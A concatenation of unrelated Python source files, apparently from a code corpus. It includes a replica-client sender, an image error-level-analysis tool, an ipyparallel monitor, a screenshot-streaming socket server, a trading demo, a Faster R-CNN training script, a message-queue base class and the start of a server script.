global kill_flag
count = 0
print("RECEIVING")
s = socket.socket()
p = select.epoll()
ip, port = client_address
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setblocking(0)
s.bind(('0.0.0.0', port))
s.listen(50)
client_logger.info("Client [%s] listening on port %s" % (client_id, port))
client_logger.info("Client IP: %s" % ip)
p.register(s)
# f = open("client_log.txt", 'w')
client_msg = "[%s] SEQUENCE: 0 REPLICA: 0 START\n" % (time.time())
# f.write(client_msg)
client_logger.debug(client_msg)
while(True):
events = p.poll()
client_logger.info("Current events queue: %s" % events)
for fd, event in events:
c, addr = s.accept()
r = c.recv(4096)
# size = struct.unpack("!I", r[:4])[0]
req = request_pb2.Request()
req.ParseFromString(r[4:])
#print(req.inner.msg, req.inner.seq, "FROM", req.inner.id)
client_msg = "[%s] SEQUENCE: %s - REPLICA: %s\n" % \
(time.time(), req.inner.seq, req.inner.id)
# f.write(client_msg)
client_logger.info(client_msg)
count += 1
if req.inner.seq % 100 == 0:
#if True:
client_logger.debug("CLIENT [%s] SEQUENCE:" % (client_id, req.inner.seq))
#if req.inner.seq == n:
if count == n * len(RL):
kill_flag = True
client_logger.debug('CLIENT [%s] total time spent with chain: %s' % (end_time - start_time))
# f.close()
if len(sys.argv) == 2:
n = int(sys.argv[1])
else:
n = 50
# id = 9
# n = 0
t = threading.Thread(target=recv_response, args=[n])
t.daemon = True
t.start()
requests_loc = os.path.join(
config_general.get("node", "ledger_location"),
"reqs.dat"
)
m = open(requests_loc, "rb").read()
client_logger.info("Loaded Messages")
client_logger.info("Starting send for bufflen %s" % len(m))
sock_list = []
# # import pdb; pdb.set_trace()
# for i in range(len(m)//4):
# b = m[:4]
# try:
# # size is > 4 after unpacking the bytes
# size = struct.unpack("!I", b)[0]
# except struct.error:
# # import pdb; pdb.set_trace()
# break
# m = m[size+4:]
# # n += 1
# # print(i, size, len(m))
start_time = time.time()
# for i in range(n):
while len(m) > 0:
b = m[:4]
try:
size = struct.unpack("!I", b)[0]
except struct.error:
pass
for ip, port in RL:
try:
#s = socket.socket()
r = socks.socksocket()
# r.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", TOR_SOCKSPORT[N], True)
## r.setblocking(0)
r.connect((ip, port))
# s.connect((ip,port))
chunk = m[:size+4]
client_logger.info("sending chunk of length %s over to replica set" % len(chunk))
r.send(chunk)
del chunk
# s.send(m[:size+4])
# sock_list.append(s)
sock_list.append(r)
r.close()
# s.close()
except Exception as e: # broad catch
client_logger.error("failed to send to [%s:%s] due to %s" % \
(ip, port, e))
pass
#s2 = socket.socket()
#s2.connect(RL[0])
#s2.send(m[:size+4])
#s2.close()
m = m[size+4:]
client_logger.info("Done sending... wait for receives")
while True:
time.sleep(1)
if kill_flag:
# give laggy requests some time to show up
time.sleep(1)
sys.exit()
|
ela.py | #!/usr/bin/python
from __future__ import print_function
from PIL import Image, ImageChops, ImageEnhance
import sys, os
import threading
import argparse
parser = argparse.ArgumentParser(description="""
Performs Error Level Analysis over a directory of images
""")
parser.add_argument('--dir', dest='directory', required=True,
help='path to the directory containing the images')
parser.add_argument('--quality', dest='quality',
help='quality used by the jpeg crompression alg.',
default=90)
TMP_EXT = ".tmp_ela.jpg"
ELA_EXT = ".ela.png"
SAVE_REL_DIR = "ELA"
threads = []
quality = 90
def ela(fname, orig_dir, save_dir):
"""
Generates an ELA image on save_dir.
Params:
fname: filename w/out path
orig_dir: origin path
save_dir: save path
"""
basename, ext = os.path.splitext(fname)
org_fname = os.path.join(orig_dir, fname)
tmp_fname = os.path.join(save_dir, basename + TMP_EXT)
ela_fname = os.path.join(save_dir, basename + ELA_EXT)
im = Image.open(org_fname)
im.save(tmp_fname, 'JPEG', quality=quality)
tmp_fname_im = Image.open(tmp_fname)
ela_im = ImageChops.difference(im, tmp_fname_im)
extrema = ela_im.getextrema()
max_diff = max([ex[1] for ex in extrema])
scale = 255.0/max_diff
ela_im = ImageEnhance.Brightness(ela_im).enhance(scale)
ela_im.save(ela_fname)
os.remove(tmp_fname)
def main ():
args = parser.parse_args()
aux=args.directory
aux=aux.split("/")
size=len(aux)
i=1
dirc = aux[0]
dirc_images=args.directory
save=SAVE_REL_DIR
while(i<size):
if((i+1)==size):
save=save+"Wiht"+aux[i]
else:
dirc=dirc+"/"+aux[i]
i=i+1
quality = args.quality
ela_dirc = os.path.join(dirc, save)
print("PATH Images: "+dirc_images)
print("PATH Final"+ela_dirc)
print("Performing ELA on images at %s" % dirc_images)
if not os.path.exists(ela_dirc):
os.makedirs(ela_dirc)
for d in os.listdir(dirc_images):
#if d.endswith(".jpg") or d.endswith(".jpeg"):
thread = threading.Thread(target=ela, args=[d, dirc_images, ela_dirc])
threads.append(thread)
thread.start()
for t in threads:
t.join()
print("Finished!")
print("Head to %s/%s to check the results!" % (dirc, SAVE_REL_DIR))
if __name__ == '__main__':
main()
else:
print("This should'nt be imported.", file=sys.stderr)
sys.exit(1)
|
hpc05_monitor.py | #!/usr/bin/env python
import asyncio
import operator
import os
import socket
from collections import defaultdict
from datetime import datetime
import psutil
MAX_USAGE = defaultdict(dict)
LATEST_DATA = {}
START_TIME = None
def get_usage():
"""return a dict of usage info for this process"""
from IPython import get_ipython
hn = socket.gethostname()
mem = psutil.virtual_memory().percent
cpu = psutil.cpu_percent()
return {
"engine_id": getattr(get_ipython().kernel, "engine_id", None),
"date": datetime.utcnow(),
"cpu": cpu,
"mem": mem,
"hostname": hn,
"pid": os.getpid(),
}
def publish_data_forever(interval):
"""Forever, call get_usage and publish the data via datapub
This will be available on all AsyncResults as `ar.data`.
"""
from threading import Thread
import time
import __main__ as user_ns # the interactive namespace
from ipyparallel.datapub import publish_data
def main():
while not getattr(user_ns, "stop_publishing", False):
publish_data(get_usage())
time.sleep(interval)
Thread(target=main, daemon=True).start()
def collect_data(session, msg_frames):
"""Collect and deserialize messages"""
from ipyparallel import serialize
global LATEST_DATA
idents, msg = session.feed_identities(msg_frames)
try:
msg = session.deserialize(msg, content=True)
except Exception as e:
print(e)
return
if msg["header"]["msg_type"] != "data_message":
return
# show the contents of data messages:
data, remainder = serialize.deserialize_object(msg["buffers"])
LATEST_DATA[data["engine_id"]] = data
def start(client, interval=5):
global START_TIME
from functools import partial
client._iopub_stream.on_recv(partial(collect_data, client.session))
ioloop = asyncio.get_event_loop()
START_TIME = datetime.utcnow()
return ioloop.create_task(_update_max_usage(interval))
async def _update_max_usage(interval):
while True:
for i, info in LATEST_DATA.items():
for k in ["cpu", "mem"]:
MAX_USAGE[i][k] = max(
(info[k], info["date"]),
MAX_USAGE[i].get(k, (0, None)),
key=operator.itemgetter(0),
)
await asyncio.sleep(interval)
def print_usage(data=None):
"""Nicely print usage data"""
if data is None:
data = LATEST_DATA
print(
" {:2s} {:20s} {:32s} {:3s}% {:3s}%".format(
"id", "hostname", "date", "CPU", "MEM"
)
)
for eid, report in sorted(data.items()):
print(
"{:3.0f} {:20s} {:32s} {:3.0f}% {:3.0f}%".format(
report["engine_id"],
report["hostname"],
report["date"].isoformat(),
report["cpu"],
report["mem"],
)
)
def print_max_usage():
if START_TIME is None:
raise Exception(
"Start the hpc05_monitor first by using" '"hpc05_monitor.start(client)".'
)
for k in ["mem", "cpu"]:
i, info = max(MAX_USAGE.items(), key=lambda x: x[1][k][0])
usage, date = info[k]
time_ago = (datetime.utcnow() - START_TIME).total_seconds()
print(
f"Max {k} usage of {usage:.2f}% on engine {i}"
f" at {date.isoformat()}, {time_ago:.0f} seconds ago."
)
if __name__ == "__main__":
publish_data_forever(interval=5)
|
server.py | from socket import socket
from threading import Thread
from zlib import compress
from mss import mss
WIDTH = int(1366 / 1)
HEIGHT = int(768 / 1)
def send_screenshot(conn):
with mss() as sct:
rect = {'top': 0, 'left': 0, 'width': WIDTH, 'height': HEIGHT}
while 'recording':
img = sct.grab(rect)
pixels = compress(img.bgra, 1)
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
conn.send(bytes([size_len]))
size_bytes = size.to_bytes(size_len, 'big')
conn.send(size_bytes)
conn.sendall(pixels)
def main(host='', port=5000):
sock = socket()
sock.bind((host, port))
try:
sock.listen(5)
print('Server started.')
while 'connected':
conn, addr = sock.accept()
print('Client connected IP:', addr)
thread = Thread(target=send_screenshot, args=(conn,))
thread.start()
finally:
sock.close()
if __name__ == '__main__':
main()
|
send_order_demo.py | from threading import Thread
from time import sleep
from ctpbee import CtpbeeApi, helper, CtpBee
from ctpbee.constant import ContractData, LogData, TickData, BarData, OrderType, Offset, OrderData, SharedData, \
TradeData, PositionData, Direction, AccountData
class Demo(CtpbeeApi):
contract_set = set(["rb1910"])
# 当前插件绑定的CtpBee的数据记录信息都在self.app.recorder下面
def on_contract(self, contract: ContractData):
""" 处理推送的合约信息 """
if contract.symbol in self.contract_set:
self.app.subscribe(contract.symbol)
def on_log(self, log: LogData):
""" 处理日志信息 ,特殊需求才用到 """
pass
def on_tick(self, tick: TickData) -> None:
""" 处理推送的tick """
pass
def on_bar(self, bar: BarData) -> None:
""" 处理ctpbee生成的bar """
# 构建发单请求
req = helper.generate_order_req_by_var(symbol=bar.symbol, exchange=bar.exchange, price=bar.high_price,
direction=Direction.LONG, type=OrderType.LIMIT, volume=3,
offset=Offset.OPEN)
# 调用绑定的app进行发单
id = self.app.send_order(req)
print("返回id", id)
def on_order(self, order: OrderData) -> None:
""" 报单回报 """
print("order", order)
def on_shared(self, shared: SharedData) -> None:
pass
def on_trade(self, trade: TradeData) -> None:
""" 成交回报 """
print("成交", trade)
def on_position(self, position: PositionData) -> None:
""" 处理持仓回报 """
def on_account(self, account: AccountData) -> None:
""" 处理账户信息 """
def letsgo():
app = CtpBee(name="demo", import_name=__name__)
# 创建对象
demo = Demo("test")
# 添加对象, 你可以继承多个类 然后实例化不同的插件 再载入它, 这些都是极其自由化的操作
app.add_extension(demo)
app.config.from_json("config.json")
app.start()
def query(time=1):
nonlocal app
while True:
app.query_position()
sleep(time)
app.query_account()
sleep(time)
# 单独开一个线程来进行查询持仓和账户信息
p = Thread(target=query, args=(2,))
p.setDaemon(daemonic=True)
p.start()
if __name__ == '__main__':
letsgo()
|
train_faster_rcnn_alt_opt.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print('Loaded dataset `{:s}` for training'.format(imdb.name))
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print('Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD))
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'faster_rcnn_alt_opt'
# Solver for each training stage
solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'],
[net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'],
[net_name, n, 'stage2_rpn_solver60k80k.pt'],
[net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 40000, 80000, 40000]
# max_iters = [100, 100, 100, 100]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print('Init model: {}'.format(init_model))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print('roidb len: {}'.format(len(roidb)))
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print('RPN model: {}'.format(rpn_model_path))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print('Loaded dataset `{:s}` for proposal generation'.format(imdb.name))
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print('Wrote RPN proposals to {}'.format(rpn_proposals_path))
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print('Init model: {}'.format(init_model))
print('RPN proposals: {}'.format(rpn_file))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, generate proposals')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage1_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 RPN, init from stage 1 Fast R-CNN model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(fast_rcnn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 RPN, generate proposals')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rpn_stage2_out['model_path']),
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = os.path.join(
os.path.dirname(fast_rcnn_stage2_out['model_path']),
args.net_name + '_faster_rcnn_final.caffemodel')
print('cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path))
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print('Final model: {}'.format(final_path))
|
MessageQueue.py | # -*- coding: utf-8 -*-
"""
pip_services3_messaging.queues.MessageQeueue
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Abstract message queue implementation.
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import threading
from abc import abstractmethod
from typing import Optional, List, Any
from pip_services3_commons.config import IConfigurable, NameResolver, ConfigParams
from pip_services3_commons.errors import InvalidStateException
from pip_services3_commons.refer import IReferenceable, IReferences
from pip_services3_components.auth import CredentialResolver, CredentialParams
from pip_services3_components.connect import ConnectionResolver, ConnectionParams
from pip_services3_components.count import CompositeCounters
from pip_services3_components.log import CompositeLogger
from pip_services3_messaging.queues import MessagingCapabilities, IMessageReceiver
from .IMessageQueue import IMessageQueue
from .MessageEnvelope import MessageEnvelope
class MessageQueue(IConfigurable, IReferenceable, IMessageQueue):
"""
Abstract message queue.
Abstract message queue that is used as a basis for specific message queue implementations.
### Configuration parameters ###
- name: name of the message queue
- connection(s):
- discovery_key: key to retrieve parameters from discovery service
- protocol: connection protocol like http, https, tcp, udp
- host: host name or IP address
- port: port number
- uri: resource URI or connection string with all parameters in it
- credential(s):
- store_key: key to retrieve parameters from credential store
- username: user name
- password: user password
- access_id: application access id
- access_key: application secret key
### References ###
- `*:logger:*:*:1.0` (optional) :class:`ILogger <pip_services3_components.log.ILogger.ILogger>` components to pass log messages
- `*:counters:*:*:1.0` (optional) :class:`ICounters <pip_services3_components.count.ICounters.ICounters>` components to pass collected measurements
- `*:discovery:*:*:1.0` (optional) :class:`IDiscovery <pip_services3_components.connect.IDiscovery.IDiscovery>` components to discover connection(s)
- `*:credential-store:*:*:1.0` (optional) :class:`ICredentialStore <pip_services3_components.auth.ICredentialStore.ICredentialStore>` componetns to lookup credential(s)
"""
def __init__(self, name: str = None, capabilities: MessagingCapabilities = None):
"""
Creates a new instance of the message queue.
:param name: (optional) a queue name
:param capabilities: (optional) a capabilities of this message queue
"""
self._lock: threading.Lock = threading.Lock()
self._event = threading.Event()
self._capabilities: MessagingCapabilities = None
self._logger: CompositeLogger = CompositeLogger()
self._counters: CompositeCounters = CompositeCounters()
self._connection_resolver: ConnectionResolver = ConnectionResolver()
self._credential_resolver: CredentialResolver = CredentialResolver()
self._name: str = name
self._capabilities = capabilities or \
MessagingCapabilities(False, False, False, False, False, False, False, False, False)
def configure(self, config: ConfigParams):
"""
Configures component by passing configuration parameters.
:param config: configuration parameters to be set.
"""
self._name = NameResolver.resolve(config)
self._logger.configure(config)
self._credential_resolver.configure(config)
self._connection_resolver.configure(config)
def set_references(self, references: IReferences):
"""
Sets references to dependent components.
:param references: references to locate the component dependencies.
"""
self._logger.set_references(references)
self._counters.set_references(references)
self._credential_resolver.set_references(references)
self._connection_resolver.set_references(references)
@abstractmethod
def is_open(self) -> bool:
"""
Checks if the component is opened.
:return: true if the component has been opened and false otherwise.
"""
def open(self, correlation_id: Optional[str]):
"""
Opens the component.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
connection = self._connection_resolver.resolve_all(correlation_id)
credential = self._credential_resolver.lookup(correlation_id)
self._open_with_params(correlation_id, connection, credential)
def _open_with_params(self, correlation_id: Optional[str], connections: List[ConnectionParams],
credential: CredentialParams):
"""
Opens the component with given connection and credential parameters.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:param connections: connection parameters
:param credential: credential parameters
"""
raise NotImplementedError('Abstract method that shall be overriden')
def _check_open(self, correlation_id: Optional[str]):
"""
Checks if the queue has been opened and throws an exception is it's not.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
if not self.is_open():
raise InvalidStateException(
correlation_id,
"NOT_OPENED",
"The queue is not opened"
)
def get_name(self) -> str:
"""
Gets the queue name
:return: the queue name.
"""
return self._name if self._name is not None else "undefined"
def get_capabilities(self) -> MessagingCapabilities:
"""
Gets the queue capabilities
:return: the queue's capabilities object.
"""
return self._capabilities
def send_as_object(self, correlation_id: Optional[str], message_type: str, message: Any):
"""
Sends an object into the queue.
Before sending the object is converted into JSON string and wrapped in a :class:`MessageEnvelope <pip_services3_messaging.MessageEnvelope.MessageEnvelope>`.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:param message_type: a message type
:param message: an object value to be sent
"""
envelop = MessageEnvelope(correlation_id, message_type, message)
self.send(correlation_id, envelop)
def begin_listen(self, correlation_id: Optional[str], receiver: IMessageReceiver):
"""
Listens for incoming messages without blocking the current thread.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:param receiver: a receiver to receive incoming messages.
"""
# Start listening on a parallel tread
thread = threading.Thread(target=self.listen, args=(correlation_id, receiver))
thread.daemon = True
thread.start()
def to_string(self) -> str:
"""
Gets a string representation of the object.
:return: a string representation of the object.
"""
return "[" + self.get_name() + "]"
def __str__(self):
"""
Gets a string representation of the object.
:return: a string representation of the object.
"""
return self.to_string()
@abstractmethod
def close(self, correlation_id: Optional[str]):
"""
Closes component and frees used resources.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
@abstractmethod
def clear(self, correlation_id: Optional[str]):
"""
Clears component state.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
@abstractmethod
def read_message_count(self) -> int:
"""
Reads the current number of messages in the queue to be delivered.
:return: a number of messages in the queue.
"""
@abstractmethod
def send(self, correlation_id: Optional[str], envelop: MessageEnvelope):
"""
Sends a message into the queue.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:param envelop: a message envelop to be sent.
"""
@abstractmethod
def peek(self, correlation_id: Optional[str]) -> MessageEnvelope:
"""
Peeks a single incoming message from the queue without removing it.
If there are no messages available in the queue it returns `None`.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:return: a peeked message or `None`.
"""
@abstractmethod
def peek_batch(self, correlation_id: Optional[str], message_count: int) -> List[MessageEnvelope]:
"""
Peeks multiple incoming messages from the queue without removing them.
If there are no messages available in the queue it returns an empty list.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:param message_count: a maximum number of messages to peek.
:return: a list of peeked messages
"""
@abstractmethod
def receive(self, correlation_id: Optional[str], wait_timeout: int) -> MessageEnvelope:
"""
Receives an incoming message and removes it from the queue.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:param wait_timeout: a timeout in milliseconds to wait for a message to come.
:return: a received message or `None`.
"""
@abstractmethod
def renew_lock(self, message: MessageEnvelope, lock_timeout: int):
"""
Renews a lock on a message that makes it invisible from other receivers in the queue.
This method is usually used to extend the message processing time.
:param message: a message to extend its lock.
:param lock_timeout: a locking timeout in milliseconds.
"""
@abstractmethod
def complete(self, message: MessageEnvelope):
"""
Permanently removes a message from the queue.
This method is usually used to remove the message after successful processing.
:param message: a message to remove.
"""
@abstractmethod
def abandon(self, message: MessageEnvelope):
"""
Returnes message into the queue and makes it available for all subscribers to receive it again.
This method is usually used to return a message which could not be processed at the moment
to repeat the attempt. Messages that cause unrecoverable errors shall be removed permanently
or/and send to dead letter queue.
:param message: a message to return.
"""
@abstractmethod
def move_to_dead_letter(self, message: MessageEnvelope):
"""
Permanently removes a message from the queue and sends it to dead letter queue.
:param message: a message to be removed.
"""
@abstractmethod
def listen(self, correlation_id: Optional[str], receiver: IMessageReceiver):
"""
Listens for incoming messages and blocks the current thread until queue is closed.
:param correlation_id: (optional) transaction id to trace execution through call chain.
:param receiver: a receiver to receive incoming messages.
"""
@abstractmethod
def end_listen(self, correlation_id: Optional[str]):
"""
Ends listening for incoming messages.
When this method is call **listen** unblocks the thread and execution continues.
:param correlation_id: (optional) transaction id to trace execution through call chain.
"""
|
CS.py | #!/usr/bin/env python3
import socket, sys, getopt, os
from signal import signal, pause, SIGINT, SIGTERM, SIG_IGN
from pickle import load, dump
from multiprocessing import Process
from multiprocessing.managers import SyncManager
from lib.server import tcp_server, udp_server, udp_client
from lib.utils import (read_bytes_until, DEFAULT_CS_PORT, CS_KNOWN_BS_SAVEFILE,
CS_VALID_USERS_SAVEFILE, CS_DIRS_LOCATION_SAVEFILE,
backup_dict_to_file, restore_dict_from_file,
ignore_sigint, get_best_ip)
# Function to deal with any protocol unexpected error
def unexpected_command(my_socket):
""" Informs that there was a error. TCP and UDP compatible. """
